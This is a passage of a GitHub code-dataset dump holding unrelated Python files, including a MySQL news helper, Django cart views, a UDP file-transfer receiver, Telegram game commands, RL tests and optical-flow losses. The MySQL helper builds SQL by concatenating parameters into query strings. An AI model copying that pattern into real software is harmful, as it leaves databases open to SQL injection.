sql=\"insert into newdata (content,channelName,title) values(%s,%s,%s)\"\n cursor.execute(sql,[content,channelName,title])\n conn.commit()\n close_conn_mysql(conn,cursor)\n#pandas读取分批插入数据库\ndef pandas_read():\n file_path = \"data/xlsx/财经.xlsx\"\n df = pd.read_excel(file_path)\n print(df.shape[0])\n print(df.iloc[0, :][\"content\"])\n for i in range(df.shape[0]):\n try:\n insert_into_mysql(df.iloc[i, :][\"content\"], df.iloc[i, :][\"channelName\"], df.iloc[i, :][\"title\"])\n except:\n print(\"NO\")\n#各类文章数统计\ndef class_text_num():\n sql=\"SELECT count(channelName) as num,channelName FROM new_class.newdata group by channelName;\"\n res=query_mysql(sql)\n return res\n#最深层\ndef deep_2(type):\n sql=\"select title from new_class.newdata where channelName='\"+type+\"'\"\n res=query_mysql(sql)\n return res\n#按题目查询文章内容\ndef find_content_by_title(title):\n sql=\"select content from new_class.newdata where title='\"+title+\"'\"\n res=query_mysql(sql)\n return res\n#查询所有文章\ndef find_all_new():\n sql=\"select content from new_class.newdata \"\n res = query_mysql(sql)\n return res\n#查询各类的文章\ndef find_type(type):\n sql=\"select content from new_class.newdata where channelName='\"+type+\"'\"\n res = query_mysql(sql)\n return res\n\nif __name__ == '__main__':\n pass","repo_name":"LINAN1345272421/new_wordcloud","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73867461652","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom Shop.models import Product\nfrom Order.models import Cart, CartToOrder\n\nfrom coupon.forms import CouponForm\nfrom coupon.models import Coupon\nfrom django.utils import timezone\n\nfrom Notification.notifications import SendNotification\n# Create your views here.\n\ndef add_to_cart(request, pk):\n if request.user.is_authenticated:\n item = get_object_or_404(Product, pk=pk)\n order_item = Cart.objects.get_or_create(item=item, user=request.user, purchased=False)\n order_qs = CartToOrder.objects.filter(user=request.user, ordered=False)\n\n if order_qs.exists():\n order = order_qs[0]\n if order.orderitems.filter(item=item).exists():\n variant = request.POST.get('variant')\n color = request.POST.get('color')\n quantity = request.POST.get('quantity')\n if quantity:\n order_item[0].quantity += int(quantity)\n else:\n order_item[0].quantity += 1\n order_item[0].variant=variant\n order_item[0].color=color\n order_item[0].save()\n\n return redirect('Shop:home')\n else:\n variant = request.POST.get('variant')\n color = request.POST.get('color')\n order_item[0].variant=variant\n order_item[0].color=color\n order.orderitems.add(order_item[0])\n\n return redirect('Shop:home')\n else:\n order = CartToOrder(user=request.user)\n order.save()\n order.orderitems.add(order_item[0])\n return redirect('Shop:home')\n else:\n return redirect('Login:user_login')\n\n\ndef cart_view(request):\n if request.user.is_authenticated:\n carts = Cart.objects.filter(user=request.user, purchased=False)\n orders = CartToOrder.objects.filter(user=request.user, ordered=False)\n code=\"\"\n total_price_with_discount=0\n if carts.exists() and orders.exists():\n order = orders[0]\n coupon_form = CouponForm(request.POST)\n if coupon_form.is_valid():\n\n current_time = timezone.now()\n code = coupon_form.cleaned_data.get('code')\n coupon_object = Coupon.objects.get(code=code, active_status=True)\n if coupon_object.valid_to >= current_time:\n get_discount = (coupon_object.discount / 100) * order.get_totals_price()\n total_price_with_discount = order.get_totals_price() - get_discount\n request.session['discount_total'] = total_price_with_discount\n request.session['coupon_code'] = code\n return redirect('Order:cart')\n else:\n coupon_object.active_status = False\n coupon_object.save()\n\n total_price_with_discount = request.session.get('discount_total')\n coupon_code = request.session.get('coupon_code')\n context = {\n 'carts': carts,\n 'order': order,\n 'coupon_form': coupon_form,\n 'coupon_code': coupon_code,\n 'total_price_with_discount': total_price_with_discount,\n }\n return render(request, 'Shop/cart.html', context)\n else:\n return redirect('Login:user_login')\n\n\n\n\ndef remove_from_cart(request, pk):\n item = get_object_or_404(Product, pk=pk)\n orders = CartToOrder.objects.filter(user=request.user, ordered=False)\n if orders.exists():\n order = orders[0]\n if order.orderitems.filter(item=item).exists():\n order_item = Cart.objects.filter(item=item, user=request.user, purchased=False)[0]\n order.orderitems.remove(order_item)\n order_item.delete()\n return redirect('Order:cart')\n else:\n return redirect('Order:cart')\n else:\n return redirect('Order:cart')\n\n\ndef increase_quantity(request, pk):\n item = get_object_or_404(Product, pk=pk)\n order_qs = CartToOrder.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n if order.orderitems.filter(item=item).exists():\n order_item = Cart.objects.filter(item=item, user=request.user, purchased=False)[0]\n if order_item.quantity >= 1:\n order_item.quantity += 1\n order_item.save()\n return redirect('Order:cart')\n else:\n return redirect('Store:home')\n else:\n return redirect('Shop:home')\n else:\n return redirect('Shop:home')\n\ndef decrease_quantity(request, pk):\n item = get_object_or_404(Product, pk=pk)\n order_qs = CartToOrder.objects.filter(user=request.user, ordered=False)\n if order_qs.exists():\n order = order_qs[0]\n if order.orderitems.filter(item=item).exists():\n order_item = Cart.objects.filter(item=item, user=request.user, purchased=False)[0]\n if order_item.quantity > 1:\n order_item.quantity -= 1\n order_item.save()\n return redirect('Order:cart')\n else:\n order.orderitems.remove(order_item)\n order_item.delete()\n return redirect('Shop:home')\n else:\n return redirect('Shop:home')\n else:\n return redirect('Shop:home')\n","repo_name":"engnraminul/Aminul-Mart","sub_path":"Order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6675476031","text":"import os\nimport shutil\n\n\"\"\"\n 需求:在经历imgSizeMove程序后,想要将文件夹内的数个文件夹里的第一张图片移动到一起\n 本代码实现将数个文件夹中的第一张图片移动到一起\n 复制:shutil.copy()\n\"\"\"\ndef main():\n img_dirs = r'E:\\test/' # 需要遍历的图片文件夹\n done_dirs = r'E:\\img/' # 保存的文件夹\n path = os.listdir(img_dirs)\n total = len(path)\n print('共%d张图片!' % total)\n for i in path:\n sizeDir = os.listdir(img_dirs + i)\n # 遍历子文件夹\n for j in sizeDir:\n print(img_dirs + i + '/' + j)\n # 移动第一张图片\n shutil.move(img_dirs + str(i) + '/' + j, done_dirs + str(i) + '.' + j.split('.')[1])\n break\n\n\nif __name__ == '__main__':\n main()\n\n print('已完成')","repo_name":"yl2018ing/study-python","sub_path":"python-tool/move-tool/imgFirstMove.py","file_name":"imgFirstMove.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"21540838363","text":"import socket\nimport sys\nfrom Packet import Packet\nfrom Packet import calculate2ByteChecksum\nfrom Packet import extract_data\nimport time\nimport random\n# Simple_ftp_server port# file-name p\nclient_ip = sys.argv[1]\nclient_port_number = int(sys.argv[2])\nfilename = sys.argv[3]\nprobability_of_loss = float(sys.argv[4])\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n# client_ip = '127.0.0.1'\nbind_port = 7735\nserver_socket.bind(('', bind_port))\nserver_socket.settimeout(20)\n# server.listen(5) # max backlog of connections\nreceived_packets = []\ntry:\n RTTs = []\n while True:\n CURRENT_SEQUENCE_NUMBER = 0\n Window = []\n RTT = 0\n startRTTCalc = True\n repeatSeq = 0\n repeatSeqCount=0\n # num_of_packets = 0\n # num_drop = 0\n with open(filename, 'w') as outfile:\n while True:\n request, address = server_socket.recvfrom(1050)\n # print(request)\n if request == b'ITERATE':\n print(\"RTTs: \", RTTs)\n print(\"avg RTT\", sum(RTTs)/len(RTTs))\n print(\"-------------------------------------------------------------------\")\n RTTs = []\n startRTTCalc = True\n break\n if request == b'END':\n print(\"Done sending\")\n RTT = time.time() - RTT\n RTTs.append(RTT)\n startRTTCalc = True\n break\n if startRTTCalc:\n RTT = time.time()\n startRTTCalc = False\n checksum = calculate2ByteChecksum(request)\n received_checksum = request[4]<<8\n received_checksum = received_checksum + request[5]\n data = extract_data(request)\n # num_of_packets += 1\n if checksum == received_checksum and random.uniform(0, 1) > probability_of_loss:\n if CURRENT_SEQUENCE_NUMBER == int(data[0]):\n # print(\"DATA:\\t\",data[3].decode(\"utf-8\"))\n outfile.write(data[3].decode(\"utf-8\"))\n packet = Packet(int(data[0]), 43690)\n server_socket.sendto(packet.packetData, (client_ip, client_port_number))\n # repeatSeq = CURRENT_SEQUENCE_NUMBER\n CURRENT_SEQUENCE_NUMBER += 1\n # repeatSeqCount = 0\n # else:\n # packet = Packet(int(data[0]), 43690)\n # server_socket.sendto(packet.packetData, (client_ip, client_port_number))\n # else:\n # num_drop = 1\n # print(\"dropped\")\n # if repeatSeq == data[0]:\n # repeatSeqCount += 1\n # if repeatSeqCount > 5:\n # packet = Packet(int(repeatSeq), 43690)\n # server_socket.sendto(packet.packetData, (client_ip, client_port_number))\n # CURRENT_SEQUENCE_NUMBER += 1\n # print(\"Packet loss, sequence number =\", data[0], \"curr_seq: \",CURRENT_SEQUENCE_NUMBER)\n # print(\"drop percent:\", num_drop*100/float(num_of_packets))\nexcept Exception as e:\n print(e)\n print(\"Connection broken\")\n","repo_name":"uddhavb/Go-Back-N-ARQ-and-Selective-Repeat-ARQ","sub_path":"Server1.py","file_name":"Server1.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28268003883","text":"\"\"\"Задача 3\nНаибольший простой делитель\nПростые делители числа 13195 - это 5, 7, 13 и 29.\n\nКаков самый большой делитель числа 600851475143, являющийся простым числом?\n\"\"\"\n\ntaskNumber = 600851475143\ndevider = taskNumber -1 \nfinish = False\nprint('task number is ', taskNumber)\n\ndef checkSimple (value): \n count = 0\n i = value -1 \n while i > 2: \n count += 1\n i -= 1 \n if value % i == 0 : \n print('not simple, number', value, 'devided on',i)\n return False \n if count == value - 3:\n print('Biggest simple ', value)\n return True\n\n'''if checkSimple(taskNumber) == True:\n finish = True'''\n\nwhile not finish: \n while taskNumber % devider != 0 and devider > 2 : \n devider -= 1 \n if checkSimple(devider) != True and devider > 2:\n devider -= 1\n else: finish= True\n \n","repo_name":"zeeenjaaa/ProjectEulerExercisesPython","sub_path":"3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30580806699","text":"#第一行有整数n(0 0:\n\t\t\t# Obtengo todos los juegos de base de datos de los que usan code\n\t\t\tcode = ' '.join(args)\n\t\t\t# Verifico que sean 3 pistas y que no sean vacias o espacios.\n\t\t\tif len([x for x in code.split(',') if x.strip()]) == 3:\n\t\t\t\t# Si puso la cantidad de pistas correctas sigo\n\t\t\t\tmensaje_error = \"\"\t\t\t\n\t\t\t\tgames_tipo = MainController.getGamesByTipo('Decrypt')\t\t\t\t\t\t\n\t\t\t\tbtns, cid = get_choose_game_buttons(games_tipo, uid, fase_actual = 'Set_Reference', commando_origen = 'code', callback_command = 'choosegamerefDE')\n\t\t\t\tuser_data[uid] = code\n\t\t\t\t\n\t\t\t\tif len(btns) != 0:\n\t\t\t\t\tif len(btns) == 0:\n\t\t\t\t\t\t#Si es solo 1 juego lo hago automatico\n\t\t\t\t\t\tgame = get_game(cid)\n\t\t\t\t\t\tadd_propose(bot, game, uid, code)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttxtBoton = \"Cancel\"\n\t\t\t\t\t\tdatos = \"-1*choosegamerefDE*\" + \"prop\" + \"*\" + str(uid)\n\t\t\t\t\t\tbtns.append([InlineKeyboardButton(txtBoton, callback_data=datos)])\n\t\t\t\t\t\tbtnMarkup = InlineKeyboardMarkup(btns)\n\t\t\t\t\t\tbot.send_message(uid, \"En cual de estos grupos queres mandar la referencia?\", reply_markup=btnMarkup)\n\t\t\t\telse:\n\t\t\t\t\tmensaje_error = \"No hay partidas en las que puedas hacer /code\"\n\t\t\t\t\tbot.send_message(uid, mensaje_error)\n\t\t\telse:\n\t\t\t\tmensaje_error = \"Debes poner 3 pistas, recuerda que cada uno se separa por coma (,) EJ: PISTA 1, *ONOMATOPEYA4*, FRASE FRASE 2\"\n\t\t\t\tbot.send_message(uid, mensaje_error)\n\n\texcept Exception as e:\n\t\tbot.send_message(uid, str(e))\n\t\tlog.error(\"Unknown error: \" + str(e))\n\ndef command_intercept(update: Update, context: CallbackContext):\n\tbot = context.bot\n\targs = context.args\n\tuser_data = context.user_data\n\ttry:\n\t\tcid = update.message.chat_id\n\t\tuid = update.message.from_user.id\n\t\t\n\t\tif update.message.chat.type in ['group', 'supergroup']:\n\t\t\tbot.delete_message(cid, update.message.message_id)\n\t\t\treturn\n\t\t\n\t\tif len(args) > 0:\n\t\t\t# Obtengo todos los juegos de base de datos de los que usan clue\n\t\t\tmensaje_error = \"\"\t\t\t\n\t\t\tgames_tipo = MainController.getGamesByTipo('Decrypt')\t\t\t\t\t\t\n\t\t\t\n\t\t\tbtns, cid = get_choose_game_buttons(games_tipo, uid, fase_actual = 'Intercept/Decrypt', \n\t\t\t\t\t\t\t\t\t\t\tcommando_origen = 'intercept', callback_command = 'choosegameintDE')\n\n\t\t\tuser_data[uid] = ' '.join(args)\n\t\t\t\n\t\t\tif len(btns) != 0:\n\t\t\t\tif len(btns) == 0:\n\t\t\t\t\t#Si es solo 1 juego lo hago automatico\n\t\t\t\t\tgame = get_game(cid)\n\t\t\t\t\tadd_intercept(bot, game, uid, ' '.join(args))\n\t\t\t\telse:\n\t\t\t\t\ttxtBoton = \"Cancel\"\n\t\t\t\t\tdatos = \"-1*choosegameintDE*\" + \"prop\" + \"*\" + str(uid)\n\t\t\t\t\tbtns.append([InlineKeyboardButton(txtBoton, callback_data=datos)])\n\t\t\t\t\tbtnMarkup = InlineKeyboardMarkup(btns)\n\t\t\t\t\tbot.send_message(uid, \"En cual de estos grupos la intercepción?\", reply_markup=btnMarkup)\n\t\t\telse:\n\t\t\t\tmensaje_error = \"No hay partidas en las que puedas hacer /intercept\"\n\t\t\t\tbot.send_message(uid, mensaje_error)\n\texcept Exception as e:\n\t\tbot.send_message(uid, str(e))\n\t\tlog.error(\"Unknown error: \" + str(e))\n\ndef command_decrypt(update: Update, context: CallbackContext):\n\tbot = context.bot\n\targs = context.args\n\tuser_data = context.user_data\n\ttry:\n\t\tcid = update.message.chat_id\n\t\tuid = update.message.from_user.id\n\t\t\n\t\tif update.message.chat.type in ['group', 'supergroup']:\n\t\t\tbot.delete_message(cid, update.message.message_id)\n\t\t\treturn\n\t\t\n\t\tif len(args) > 0:\n\t\t\t# Obtengo todos los juegos de base de datos de los que usan clue\n\t\t\tmensaje_error = \"\"\t\t\t\n\t\t\tgames_tipo = MainController.getGamesByTipo('Decrypt')\t\t\t\t\t\t\n\t\t\t\n\t\t\tbtns, cid = get_choose_game_buttons(games_tipo, uid, fase_actual = 'Intercept/Decrypt', \n\t\t\t\t\t\t\t\t\t\t\t\tcommando_origen = 'decrypt', callback_command = 'choosegamedecDE')\n\n\t\t\tuser_data[uid] = ' '.join(args)\n\t\t\t\n\t\t\tif len(btns) != 0:\n\t\t\t\tif len(btns) == 0:\n\t\t\t\t\t#Si es solo 1 juego lo hago automatico\n\t\t\t\t\tgame = get_game(cid)\n\t\t\t\t\tadd_decrypt(bot, game, uid, ' '.join(args))\n\t\t\t\telse:\n\t\t\t\t\ttxtBoton = \"Cancel\"\n\t\t\t\t\tdatos = \"-1*choosegamedecDE*\" + \"prop\" + \"*\" + str(uid)\n\t\t\t\t\tbtns.append([InlineKeyboardButton(txtBoton, callback_data=datos)])\n\t\t\t\t\tbtnMarkup = InlineKeyboardMarkup(btns)\n\t\t\t\t\tbot.send_message(uid, \"En cual de estos grupo realizas la desencripción?\", reply_markup=btnMarkup)\n\t\t\telse:\n\t\t\t\tmensaje_error = \"No hay partidas en las que puedas hacer /decrypt\"\n\t\t\t\tbot.send_message(uid, mensaje_error)\n\texcept Exception as e:\n\t\tbot.send_message(uid, str(e))\n\t\tlog.error(\"Unknown error: \" + str(e))\n\t\traise e\n\t\t\n","repo_name":"leviatas/MultigamesV2","sub_path":"Decrypt/Commands.py","file_name":"Commands.py","file_ext":"py","file_size_in_byte":14398,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"28421438789","text":"'''\n实验名称:舵机(Servo)-180°\n版本:v1.0\n日期:2021.1\n作者:01Studio\n说明:控制舵机旋转不同角度。\n'''\n\nfrom machine import Pin, PWM\nimport time\n\nS1 = PWM(Pin(0)) # Servo1的引脚是0\nS1.freq(50) #舵机控制信号频率\n\n'''\n说明:舵机控制函数\n功能:180度舵机:angle:-90至90 表示相应的角度\n 360连续旋转度舵机:angle:-90至90 旋转方向和速度值。\n'''\ndef Servo(servo,angle):\n a = int(((angle+90)*2/180+0.5)/20*65535)\n print(a)\n S1.duty_u16(a)\n\nwhile True:\n \n #-90度\n Servo(S1,-90)\n time.sleep(1)\n\n #-45度\n Servo(S1,-45)\n time.sleep(1)\n\n #-0度\n Servo(S1,0)\n time.sleep(1)\n\n #45度\n Servo(S1,45)\n time.sleep(1)\n\n #90度\n Servo(S1,90)\n time.sleep(1)","repo_name":"01studio-lab/MicroPython_Examples","sub_path":"pyPico/3.拓展实验/1.舵机/180度舵机/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"zh","doc_type":"code","stars":107,"dataset":"github-code","pt":"67"} +{"seq_id":"25797752599","text":"from time import time\n\nstart = time()\n\nwith open(r\"c:\\git\\kodekalendere\\knowit\\dag21\\generations.txt\", 'r') as f: \n generasjoner = f.read().splitlines()\n generasjoner = [ [ tuple( int(i) for i in a.split(',')) for a in g.split(';') ] for g in generasjoner ]\n\ndef solve(generasjoner):\n\n antall_alver = len(generasjoner[0])\n sets = [set([i]) if i % 2 else set([]) for i in range(antall_alver)]\n\n for gn, g in enumerate(generasjoner,1):\n \n newset = [ set([]) for i in range(antall_alver)]\n \n for i,(a,b) in enumerate(g):\n newset[a] = newset[a].union(sets[i]) \n newset[b] = newset[b].union(sets[i])\n\n if 2**(gn+1) >= antall_alver//2:\n for alv, s in enumerate(newset):\n if len(s) == antall_alver//2:\n return f\"{gn}:{alv} er løsningen.\"\n\n sets = newset\n \nprint(solve(generasjoner))\nprint( time() - start )","repo_name":"Armcollector/kodekalendere","sub_path":"knowit/Dag21/knowit21.py","file_name":"knowit21.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"69941969173","text":"#!/mnt/grl/software/epd/bin/python\n'''\nformat DGE results\n'''\n__author__ = \"Xiaoyu Liu\"\n__email__ = \"liux@nbio.info\"\n__copyright__ = \"Copyright (C) 2016 Xiaoyu Liu\"\n__status__ = \"development\"\n__license__ = \"Public Domain\"\n__version__ = \"0.2b\"\n\nimport os, sys, json\nimport pandas as pd\n\ndef save_gene_table(config_fn, fc_file):\n config = json.loads(open(config_fn, 'r').read())\n exp, ctrl = os.path.basename(fc_file).split(\".\")[0].split(\"_vs_\")\n feature = os.path.basename(fc_file).split(\".\")[1].split(\"_\")[0]\n w_dir = config['workdir']\n tpm = None\n for s in config[\"treatments\"][exp]+config[\"treatments\"][ctrl]:\n exp_fn = \"{d}/expression/{s}_{f}_table.txt\".format(d=w_dir, s=s, f=feature)\n df = pd.read_table(exp_fn, index_col = [0])\n if tpm is None: # get the first samples expression value\n tpm = df[[\"TPM\"]]\n tpm.columns = [s]\n continue\n # add the TPM value to the table\n tpm[s] = df[[\"TPM\"]]\n # avg expresion, fold change, and p_value\n df = pd.read_table(fc_file, index_col=[0])\n tpm=tpm.ix[df.index]\n \n # add average expression to the table\n tpm[\"avg\"] = tpm.mean(axis=1)\n \n tpm['p-value'] = 1-df.PPDE\n tpm['Fold Change'] = df.RealFC.apply(lambda x: x if x >= 1 else -1/x ) # change fc <1 to negative number\n \n tpm.to_csv(sys.stdout, sep=\"\\t\", float_format='%.2f')\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 3:\n save_gene_table(sys.argv[1], sys.argv[2])\n else:\n print(\"Usage: {} config_file fold_change_file\".format(argv[0]))\n","repo_name":"yxuil/nbio_mrnaseq","sub_path":"modules/EBseq/format_rsem_results.py","file_name":"format_rsem_results.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26351201270","text":"import unittest\n\nimport numpy as np\n\nfrom rl.playground import grid_system\n\nN = 1000\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_single(self):\n gvf = grid_system.GridValueFunction()\n\n state = np.zeros((1, 64))\n values = gvf.get_value(state)\n\n self.assertEqual((1, 4), values.shape)\n print(values)\n\n def test_multi(self):\n gvf = grid_system.GridValueFunction()\n\n state = np.zeros((2, 64))\n values = gvf.get_value(state)\n\n print(values)\n\n def test_generate_action_target_values(self):\n\n grid_sys = grid_system.GridSystem()\n grid_sys.initialise_value_function(epochs=10)\n\n states, action_rewards, new_states = grid_sys.generate_experience(num_epochs=10)\n\n new_state_values = grid_sys.generate_action_target_values(new_states)\n\n N = len(new_state_values)\n expected = np.ndarray((N, grid_sys.num_actions))\n for i in range(N):\n for action in range(grid_sys.num_actions):\n action_values = grid_sys.value_function.get_value(new_states[i][action].reshape(1, grid_sys.state_size))\n expected[i, action] = action_values.max()\n\n np.testing.assert_almost_equal(expected, new_state_values)\n\n def test_initialise_value_function(self):\n grid_sys = grid_system.GridSystem()\n grid_sys.initialise_value_function(100)\n\n fixed_grid_state = grid_system.new_fixed_grid_state()\n value_grid = grid_sys.get_value_grid(fixed_grid_state)\n self.assertTrue(5.0 < value_grid[2, 3] < 15.0)\n\n def test_generate_experience(self):\n\n grid_sys = grid_system.GridSystem()\n states, action_rewards, new_states, new_states_terminal = grid_sys.experience_generator.generate_experience(num_epochs=100)\n\n self.assertTrue(states.shape[0]>100)\n\n state = grid_system.new_fixed_grid_state()\n state.update_player((1, 3))\n\n print(states)\n\n self.assertIn(state.as_vector(), states)\n\n matches = np.where(np.all(states == state.as_vector(), axis=1))[0]\n\n match = matches[0]\n\n np.testing.assert_array_almost_equal(np.array([-1., -1., -1., -1.]), action_rewards[match])\n\n action_targets = grid_sys.generate_action_target_values(new_states)[match]\n # We should be training this value towards 10.0\n self.assertGreater(action_targets[1], 5)\n\n\n\n\n #\n # def test_init_grid(self):\n # grid = rle.init_grid()\n # self.assertEqual((0, 1), grid.player)\n # self.assertEqual((2, 2), grid.wall)\n # self.assertEqual((3, 3), grid.goal)\n # self.assertEqual((3, 3), grid.goal)\n #\n # def test_as_one_hot(self):\n # grid = rle.init_grid()\n # vec = grid.as_one_hot()\n #\n # self.assertIsInstance(vec, np.ndarray)\n # self.assertEqual(64, vec.shape[0])\n # self.assertTrue(vec[1]) # Player\n # self.assertTrue(vec[26]) # Wall\n # self.assertTrue(vec[37]) # Pit\n # self.assertTrue(vec[63]) # Goal\n #\n # def test_as_2d_array(self):\n #\n # grid = rle.init_grid()\n #\n # actual = grid.as_2d_array()\n #\n # expected = np.empty((4, 4), dtype=' 0:\n scaled_flow_gt = scaled_flow_gt - F.interpolate(ms_flow_pred[l-1], scale_factor=2, mode='bilinear', align_corners=True, recompute_scale_factor=True)\n scaled_flow_gt = scaled_flow_gt / 2**(self.ds-l)\n\n scaled_flow_distribution = vector2density(scaled_flow_gt, self.corr_range[l]) * valid_mask\n kld_loss += 4**(self.ds-l) / (H * W) * criterion(F.log_softmax(ms_flow_prob[l], dim=1), scaled_flow_distribution.detach())\n\n losses['total'] = kld_loss\n for loss_type, loss_value in losses.items():\n losses[loss_type] = loss_value.reshape(1)\n return losses\n\n\nclass OpticalFlowLossMFN:\n def __init__(self, scales, weights, match=\"upsampling\", eps=1e-8, q=None):\n self.scales = scales\n self.weights = weights\n self.match = match\n self.eps = eps\n self.q = q\n\n self.ms_epe = MultiScaleEPELoss(self.scales, self.weights, self.match, self.eps, self.q)\n\n def __call__(self, flow_pred_list, flow_gt, mask):\n losses = {}\n ms_epe_loss = self.ms_epe(flow_pred_list, flow_gt, mask)\n\n losses['total'] = ms_epe_loss\n # print(ms_epe_loss)\n # for loss_type, loss_value in losses.items():\n # losses[loss_type] = loss_value.reshape(1)\n return losses\n\n\nclass OpticalFlowLossMFNInstance:\n def __init__(self, scales, weights, match=\"upsampling\", eps=1e-8, q=None):\n self.scales = scales\n self.weights = weights\n self.match = match\n self.eps = eps\n self.q = q\n\n self.ms_epe = MultiScaleEPELoss(self.scales, self.weights, self.match, self.eps, self.q)\n\n def __call__(self, flow_pred_list, flow_gt, mask, reproj_loss):\n losses = {}\n ms_epe_loss = self.ms_epe(flow_pred_list, flow_gt, mask)\n\n losses[\"pose_error\"] = reproj_loss['pose_error']\n # losses['reproj_pnp_gt'] = reproj_loss[\"pnp_gt\"]\n # losses['reproj_pnp_pred'] = reproj_loss[\"pnp_pred\"]\n\n losses['total'] = ms_epe_loss + (reproj_loss['pose_error'])\n\n\n # print(ms_epe_loss)\n # for loss_type, loss_value in losses.items():\n # losses[loss_type] = loss_value.reshape(1)\n return losses\n\n\nclass EPELossWithMask:\n def __init__(self, eps=1e-8, q=None):\n super(EPELossWithMask, self).__init__()\n self.eps = eps\n self.q = q\n\n def __call__(self, flow_pred, flow_gt, mask):\n # flow_pred = flow_pred[mask]\n # flow_gt = flow_gt[mask]\n # print(torch.min(mask), torch.max(mask))\n nan_count = torch.sum(flow_pred != flow_pred)\n if nan_count > 0:\n print(\"NAN FOUND!: {}\".format(nan_count))\n\n if self.q is not None:\n loss = ((flow_pred - flow_gt).abs().sum(1) + self.eps) ** self.q\n else:\n loss = ((flow_pred - flow_gt).pow(2).sum(1) + self.eps).sqrt()\n loss = loss * mask.squeeze(1)\n loss = loss.view(loss.shape[0], -1).sum(1) / mask.view(mask.shape[0], -1).sum(1)\n\n loss[loss != loss] = 0.\n\n return loss\n\n\nclass EPELoss:\n def __init__(self, eps=0):\n super(EPELoss, self).__init__()\n self.eps = eps\n\n def __call__(self, flow_pred, flow_gt):\n loss = ((flow_pred - flow_gt).pow(2).sum(1) + self.eps).sqrt()\n return loss.view(loss.shape[0], -1).mean(1)\n\n\nclass MultiScaleEPELoss:\n def __init__(self, scales, weights, match, eps=1e-8, q=None):\n super(MultiScaleEPELoss, self).__init__()\n self.scales = scales\n self.weights = weights\n self.match = match\n self.eps = eps\n self.q = q\n\n # self.epe_loss_with_mask = EPELossWithMask(eps=self.eps, q=self.q)\n\n def __call__(self, flow_pred_list, flow_gt, mask):\n losses = 0\n\n if self.match == \"upsampling\":\n for pred_level, weight_level, scale_level in zip(flow_pred_list, self.weights, self.scales):\n losses += EPELossWithMask(eps=self.eps, q=self.q)(Upsample(pred_level, scale_level), flow_gt, mask) * weight_level\n # losses += self.epe_loss_with_mask(Upsample(pred_level, scale_level), flow_gt, mask) * weight_level\n else:\n raise NotImplementedError\n\n return losses\n\ndef EndPointError(output, gt):\n # output: [B, 1/2, H, W], stereo or flow prediction\n # gt: [B, C, H, W], 2D ground-truth annotation which may contain a mask\n # NOTE: To benchmark the result, please ensure the ground-truth keeps\n # its ORIGINAL RESOLUTION.\n output = resize_dense_vector(output, gt.size(2), gt.size(3))\n error = torch.norm(output - gt[:, :2, :, :], 2, 1, keepdim=False)\n if gt.size(1) == 3:\n mask = (gt[:, 2, :, :] > 0).float()\n else:\n mask = torch.ones_like(error)\n epe = (error * mask).sum() / mask.sum()\n return epe.reshape(1)\n\nclass OpticalFlowLossRAFT:\n def __init__(self, max_flow=400, gamma=0.8, eps=1e-8):\n super(OpticalFlowLossRAFT, self).__init__()\n self.eps = eps\n self.max_flow = max_flow\n self.gamma = gamma\n\n def __call__(self, flow_pred_iter, flow_gt, valid_mask):\n losses = {}\n\n flow_gt, _ = pad_packed_images(flow_gt)\n valid_mask, _ = pad_packed_images(valid_mask)\n\n # Check for nan in predictions\n nan_count = 0\n for i in range(len(flow_pred_iter)):\n nan_count = nan_count + torch.sum(flow_pred_iter[i] != flow_pred_iter[i])\n if nan_count > 0:\n print(\"NAN FOUND!: {}\".format(nan_count))\n\n # Remove the invalid pixels and the pixels with large displacements\n # mag = torch.sum(flow_gt ** 2, dim=1).sqrt().unsqueeze(1)\n # valid_mask = valid_mask & (mag < self.max_flow)\n\n flow_seq_loss = self.computeSequenceLoss(flow_pred_iter, flow_gt, valid_mask)\n # flow_edge_loss = self.computePanopticEdgeLoss(flow_pred_iter, flow_gt, valid_mask, po_mask)\n\n losses['total'] = flow_seq_loss\n\n return losses\n\n def computeSequenceLoss(self, flow_pred_iter, flow_gt, valid_mask):\n num_preds = len(flow_pred_iter)\n flow_loss = 0.0\n for i in range(num_preds):\n i_weight = self.gamma ** (num_preds - i - 1)\n i_loss = (flow_pred_iter[i] - flow_gt).abs()\n flow_loss += i_weight * (valid_mask * i_loss).mean()\n\n return flow_loss\n\n def computeInstanceEdgeLoss(self, flow_pred_iter, flow_gt, valid_mask, po_mask):\n # Get the instance outline mask\n inst_edge_map, grad_x, grad_y, grad_mag = self.computeInstanceEdgeMap(po_mask)\n\n # Sample points from the instance edges and neighbouring points\n inst_edge_points = torch.nonzero(inst_edge_map, as_tuple=True)\n points_a, points_b = self.getNeighbourhoodPointPairs(inst_edge_map, inst_edge_points, grad_x, grad_y, grad_mag)\n\n # Remove samples where the GT is not valid --> valid_mask = False\n points_valid = valid_mask[points_a] & valid_mask[points_b]\n points_a_valid = (points_a[0][points_valid], points_a[1][points_valid], points_a[2][points_valid], points_a[3][points_valid])\n points_b_valid = (points_b[0][points_valid], points_b[1][points_valid], points_b[2][points_valid], points_b[3][points_valid])\n\n # Handle the case when the valid mask has no valid points\n if points_a_valid[0].shape[0] == 0:\n return 